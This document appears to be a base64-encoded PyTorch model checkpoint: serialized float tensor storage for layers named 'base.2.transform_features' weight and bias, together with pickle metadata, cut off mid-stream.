JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+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